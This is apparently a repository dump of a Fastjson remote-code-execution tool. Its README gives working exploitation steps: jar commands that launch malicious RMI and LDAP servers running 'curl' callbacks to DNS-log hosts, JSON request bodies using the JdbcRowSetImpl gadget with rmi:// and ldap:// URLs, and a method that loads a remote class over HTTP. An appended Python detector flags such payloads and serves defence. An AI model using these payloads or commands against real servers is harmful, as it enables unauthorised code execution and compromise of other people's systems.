├── 2.png
├── README.md
├── fastjson_tool.jar
└── work.png


/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nnewkin/fastjson_rce_tool/bba755f6c5f5fc27033de8534bec1f89e5c742ef/2.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# fastjson_rce_tool

```
With the introduction of various security-related laws, this project has been closed to the public since early 2020.

Note: the exploitation methods here can bypass some restrictions to achieve command execution.


rmi:
1. Start the RMI server, followed by the command to execute (has dependencies; reproduces reliably on tomcat8)
java -cp fastjson_tool.jar EvilRMIServer 8888 53 "curl dnslog.wyzxxz.cn"

2. Send the request
POST /test HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X)

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:8888/Object","autoCommit":true}

3. Check the logs to see whether the curl succeeded

===================================================================================================

ldap:
1. Start the LDAP server, followed by the command to execute
java -cp fastjson_tool.jar LDAPRefServer2 8888 CommonsCollections1 "curl dnslog.cn"

2. Send the request
POST /test HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X)

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:8888/Object","autoCommit":true}


3. Check the logs to see whether execution succeeded

===================================================================================================
else:

Exploitation may not succeed in some environments; in that case you can try the default test method,
for example:
generate the test class file and start an HTTP server,
then start the LDAP server, which fetches the class from the HTTP server
java -cp fastjson_tool.jar LDAPRefServer http://ip:port/#Object 8888

```


![0](https://github.com/wyzxxz/fastjson_rce_tool/blob/master/work.png)

![1](https://github.com/wyzxxz/fastjson_rce_tool/blob/master/2.png)


--------------------------------------------------------------------------------
/fastjson_tool.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nnewkin/fastjson_rce_tool/bba755f6c5f5fc27033de8534bec1f89e5c742ef/fastjson_tool.jar


--------------------------------------------------------------------------------
/work.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nnewkin/fastjson_rce_tool/bba755f6c5f5fc27033de8534bec1f89e5c742ef/work.png
--------------------------------------------------------------------------------
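
A detection-side check for the request bodies shown in the README, added here as an example and not part of the fastjson_rce_tool repository: it walks a captured JSON body and flags any object whose `@type` names `com.sun.rowset.JdbcRowSetImpl` or that carries an `rmi://` or `ldap://` value. The function name `inspect_body`, the severity labels and the sample bodies are assumptions made for illustration.

```python
import json

# Gadget class taken from the README's request bodies; a production list
# would be longer (this set is an illustrative assumption).
GADGET_TYPES = {"com.sun.rowset.JdbcRowSetImpl"}
JNDI_SCHEMES = ("rmi://", "ldap://")  # the two schemes the README uses

def inspect_body(body):
    """Return one finding per JSON object in `body` that carries an @type key."""
    try:
        doc = json.loads(body)
    except ValueError:
        # fastjson accepts input that strict parsers reject, so a parse
        # failure is not a clean verdict: fall back to a raw marker check.
        raw = body.lower()
        if "@type" in raw or "\\u0040type" in raw:
            return [{"path": "$", "type": None, "jndi": [], "severity": "review"}]
        return []
    findings, stack = [], [("$", doc)]
    while stack:
        path, node = stack.pop()
        if isinstance(node, dict):
            if "@type" in node:  # json.loads already decoded \u0040 to '@'
                cls = node["@type"]
                jndi = [v for v in node.values()
                        if isinstance(v, str) and v.strip().lower().startswith(JNDI_SCHEMES)]
                known = isinstance(cls, str) and cls in GADGET_TYPES
                findings.append({"path": path, "type": cls, "jndi": jndi,
                                 "severity": "high" if known or jndi else "review"})
            stack.extend((f"{path}.{k}", v) for k, v in node.items())
        elif isinstance(node, list):
            stack.extend((f"{path}[{i}]", v) for i, v in enumerate(node))
    return findings

# Constructed sample bodies: the README's RMI request, a nested and
# unicode-escaped variant, a benign body, and non-strict single-quoted JSON.
README_RMI = ('{"@type":"com.sun.rowset.JdbcRowSetImpl",'
              '"dataSourceName":"rmi://127.0.0.1:8888/Object","autoCommit":true}')
NESTED_ESCAPED = ('{"order":{"items":[{"\\u0040type":"com.sun.rowset.JdbcRowSetImpl",'
                  '"dataSourceName":"ldap://127.0.0.1:8888/Object","autoCommit":true}]}}')
BENIGN = '{"user":"alice","note":"directory lives at ldap://directory.example/"}'
LOOSE = "{'@type':'com.sun.rowset.JdbcRowSetImpl'}"

if __name__ == "__main__":
    for name, body in [("readme_rmi", README_RMI), ("nested", NESTED_ESCAPED),
                       ("benign", BENIGN), ("loose", LOOSE)]:
        print(name, inspect_body(body))
```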